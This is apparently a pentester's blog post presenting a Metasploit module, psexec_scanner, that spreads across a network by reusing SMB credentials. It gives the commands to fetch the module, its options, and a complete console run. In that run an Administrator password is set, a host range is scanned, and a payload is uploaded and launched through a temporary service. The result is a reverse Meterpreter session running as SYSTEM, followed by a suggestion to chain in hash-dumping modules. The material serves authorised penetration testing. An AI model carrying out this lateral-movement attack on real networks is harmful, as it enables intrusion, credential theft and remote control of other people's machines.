Some time ago I was talking with Martin Bos also know as @pure_hate one of the members of the Backtrack Development team and a Pentester and he mentioned that he would love to have a better way of using the psexec module that is already part on the framework in an easier way than using resource scripts which he had to modify and play with for each engagement. So I took it upon myself to help him out an write an auxiliary scanner module for him to use in egagements, at the same time Larry Pesce from Pauldotcom came to me with a similar requirement for when he is doing pentests against client environments and wanted to re-use the credentials he gathered inside the framework that are stored in the database so I came with the following requirements:
The module i wrote can be found in my GitHub page at psexec_scanner. To use the module you need to do:
mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/
curl -O https://raw.github.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb
Now we can use the module with any instance of the framework we load in the system making it easier to use across forks of the repository.
Now when we are inside msfconsole we can load the module and look at the options it provides:
msf > use auxiliary/scanner/smb/psexec_scanner
msf auxiliary(psexec_scanner) > show options
Module options (auxiliary/scanner/smb/psexec_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true no Start an Exploit Multi Handler to receive the connection
LHOST yes Local Hosts for payload to connect.
LPORT yes Local Port for payload to connect.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp yes Payload to use against Windows host
RHOSTS yes Range of hosts to scan.
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP yes SMB Domain
SMBPass no SMB Password
SMBUser no SMB Username
THREADS 1 yes The number of concurrent threads
TYPE manual no Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)
As we can see it takes 2 options when it comes to credentials one where we set one single credential to test against several systems or use the credentials found in the database for the current workspace. The credentials in the database will use those stored there in plain text or smb hash format so it will used those found via dumping hashes from target systems and those found thru bruteforcing like the smblogin modules. I did not add the bruteforcing part using a list of user and passwords since the smblogin module is much better suited for this task. Having the module use the options this ways makes it perfect for levering a initial compromise to some systems and expand it to a wider range.
Lets do a sample run against some target systems using a set of credentials I was able to obtain by other means and run it against a range. We start by setting the appropriate options for the payload, set a range to scan, credentials and the number of threads to use:
msf auxiliary(psexec_scanner) > set LHOST 172.16.163.1
LHOST => 172.16.163.1
msf auxiliary(psexec_scanner) > set LPORT 4444
LPORT => 4444
msf auxiliary(psexec_scanner) > set RHOSTS 172.16.163.2-150
RHOSTS => 172.16.163.2-150
msf auxiliary(psexec_scanner) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(psexec_scanner) > set SMBPass Newsystem01
SMBPass => Newsystem01
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
Once we have all set we can launch the scan against the range:
msf auxiliary(psexec_scanner) > run
[*] Using the username and password provided
#<#<Class:0x007fc88d91aef8>:0x007fc88c53c690>
[*] Starting exploit multi handler
[*] Started reverse handler on 172.16.163.1:4444
[*] Starting the payload handler...
[*] Scanned 019 of 149 hosts (012% complete)
[*] Scanned 030 of 149 hosts (020% complete)
[*] Scanned 045 of 149 hosts (030% complete)
[*] Scanned 060 of 149 hosts (040% complete)
[*] Scanned 075 of 149 hosts (050% complete)
[*] Scanned 090 of 149 hosts (060% complete)
[*] Scanned 105 of 149 hosts (070% complete)
[*] Scanned 120 of 149 hosts (080% complete)
[*] 172.16.163.141:445 - TCP OPEN
[*] Trying Administrator:Newsystem01
[*] Connecting to the server...
[*] Authenticating to 172.16.163.141:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Scanned 136 of 149 hosts (091% complete)
[*] Created \tMxFrkje.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PKTFMpHK - "MHLGojYuKIPncRpRNJynImVk")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \tMxFrkje.exe...
[*] Sending stage (752128 bytes) to 172.16.163.141
[*] Meterpreter session 1 opened (172.16.163.1:4444 -> 172.16.163.141:49159) at 2011-12-15 20:23:52 -0400
[*] Scanned 149 of 149 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_scanner) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN2K8R2-01 172.16.163.1:4444 -> 172.16.163.141:49159
msf auxiliary(psexec_scanner) >
A great way to keep leveraging would be to set in the options smart_hashdump and the credential modules as a macro to run against a session in the AutoRunScript option.
Hope you find this blog post useful as always.